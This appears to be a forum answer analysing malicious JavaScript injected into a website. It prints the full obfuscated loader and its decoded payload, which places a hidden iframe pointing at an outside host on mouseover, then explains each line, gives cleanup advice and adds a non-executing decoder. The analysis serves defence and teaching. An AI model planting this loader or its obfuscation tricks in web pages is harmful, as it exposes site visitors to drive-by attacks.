It's not a virus, but it is malicious code. The whole code is:
window.w3ssss=function(){
var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Agod%0Argdiioufb5br4up%3Dj5nds1eo27rce5iukeymf32eye6nd1otd6p.djdch7jrmlpeb6iarwwt7fnehogExfllw2fef6rms8dedwlneflt0xa%289op%22iwyi0jbfb5qr0huam6kmjnjebk6%229ne%29k2t%3B92w%0Atrbi7xwfgygrby4.d6usds2r6lqc0op%3Dyla%22sj6hnuitjr5trrzpjbv%3Aag5/4ne/mlhvrfkcsno-f0fb52wugljsbswiplqnihkeccts3g0sent.mduc93toyxbmy7u/94sid0znyv8.rp8p408h30dpvsg%22rv4%3B6hv%0Agsdi2lifsi9rcho.2kls691t0ekyjqxlvgierel.323w6twiwh2dl3yt3hghjks%3Dphp%228dm100ipk97xquk%221r9%3B4vh%0A08diu28fb0cr2tp.9nys8swtbfwy3h8l5eaeiql.eiohwedeuwvi2fggwbxhrextp7t%3De6n%22wr41xb9p33hxl9y%22b5q%3Bvj0%0Abked5sroashcirduaemm6vze316npyhtbtz.ymcg5y9e95bt69tEs9pljozejf0mo6xej35nhpftxv8BituyhjnIrvxdmja%28ogs%228hwwtis3r3bsq7dtdvsad7cttpjs2ek%2293b%296gq.ag8au9epp09p29ve4q9nn5ddzp7C8akhdbuife5lacndb3l%28wq7ine2fl54r0f8%29uen%3B96e%0Abl4%0Azwv";
var visitnum=window.history.length%1000-window.history.length+4;
var countbox=document.createElement("div");countbox.id='countbox';
idarr = new Array(97,114,93,104);
for(var i=0,elem=[]; i<visitnum; i++){elem[i]=document.createElement("div");elem[i].id= String.fromCharCode(idarr[i]+visitnum);countbox.appendChild(elem[i]);}
var cont=''; currentuser=true, nextuser=countbox.firstChild;
do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild)
var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11));
for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);}
try{window[cont](content)}catch(e){}
}
window.CheckBody = function()
{
if (!document.body){setTimeout('CheckBody();',10);}
else
{
window.nomore=false;
document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
}
}
CheckBody();
If you care what it's doing:
Line 1 creates the function w3ssss. If you google it, you'll find more information on this hack, and it's common.
Line 2 is the payload. The actual URL is irrelevant. It returns a 404. What is important is what comes after userrefer. Remember that part for later.
Line 3 gives the appearance you're tracking visits. It's just setting the variable to 4 unless you have greater than 1000 entries in your window history, which you likely never will, so it's just 4.
Line 4 creates a div on the page.
Line 5 is an array of ASCII decimal values offset by 4.
Line 6 is a loop that builds a string that corresponds to the ASCII values in line 5. It results in "eval".
Line 7 just creates a few variables.
Line 8 gets the last child of the div that it created in line 4. As far as I can tell, this is just for appearance as the div should be empty.
Line 9 unescapes the encoded command in Line 2.
Line 10 builds the malicious command by taking every 4th character from the unescaped command. You end up with:
ifr=document.createElement("iframe");
ifr.src="http://vc-business.com/in.php";
ifr.style.width="1px";
ifr.style.height="1px";
document.getElementById("w3stats").appendChild(ifr);
This just creates an iframe pointed at vc-business.com and inserts it into the page.
Line 11 executes the command.
Line 13 creates a function that...
Line 15 will check to see if the body element exists yet and waits 10 ms and checks again until...
Line 18 sets a variable so that the iframe doesn't get called a 2nd time.
Line 19 will trigger the w3ssss function created in line 1 when the body is hovered on or
Line 20 when the window is hovered
And finally line 23 gets the whole process going.
The obfuscation isn't all that difficult once you understand how it's doing it. I think, however, there is one error in it. The encoded javascript looks for an element with an id of "w3stats" to insert the iframe into, not "countbox" that's created in step 4.
To remove: Delete everything between and including the script tags. Also check all your other pages and change your credentials for your website as it's obviously been compromised.
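The decoding steps walked through above, written as a static decoder that never calls eval. This is an added example, not part of the original answer. The function names, the sample link and its .example hosts are constructed for illustration, and 12 is an assumed history length.

```javascript
// Static decoder for the loader analysed above. Nothing is evaluated:
// the hidden script is returned as a string for inspection.

// The loader's stride expression: 4 for any history length below 1000.
function strideFor(historyLength) {
  return (historyLength % 1000) - historyLength + 4;
}

// Rebuild the hidden function name from the id array plus the stride.
function decodeSinkName(codes, offset) {
  return codes.map((c) => String.fromCharCode(c + offset)).join('');
}

// Take the text after the marker, percent-decode it, keep every stride-th char.
function decodeStride(link, marker, stride) {
  const at = link.indexOf(marker);
  if (at < 0 || !Number.isInteger(stride) || stride < 1) return null;
  let raw = link.slice(at + marker.length);
  try { raw = decodeURIComponent(raw); } catch (e) { return null; }
  let out = '';
  for (let i = 0; i < raw.length; i += stride) out += raw.charAt(i);
  return out.trim();
}

// URLs in the decoded script: candidates for blocklists and log searches.
function extractUrls(script) {
  return script.match(/https?:\/\/[^\s"'<>)]+/g) || [];
}

// Constructed sample (not the payload from the page); hosts are placeholders.
const SAMPLE_LINK = 'http://cdn.example/s.js?userrefer=' +
  'fq7z.b2ks9dxrm4ncyy1%3Dk2w%22r8ahu0pte5jtw1opzz3:a6g' +
  '/n4e/m1hbv3fak9sdo2f.b5weu8lxj1saw7imp3qpl0nli4hec2t/s3g%220se;n9m';

function analyse(link) {
  const stride = strideFor(12); // 12: an assumed, typical history length
  const script = decodeStride(link, '?userrefer=', stride);
  return {
    sink: decodeSinkName([97, 114, 93, 104], stride),
    script,
    urls: script ? extractUrls(script) : [],
  };
}

console.log(analyse(SAMPLE_LINK));
```

Run against a suspicious script's link string, the `urls` list gives the hosts to search for in proxy and web server logs.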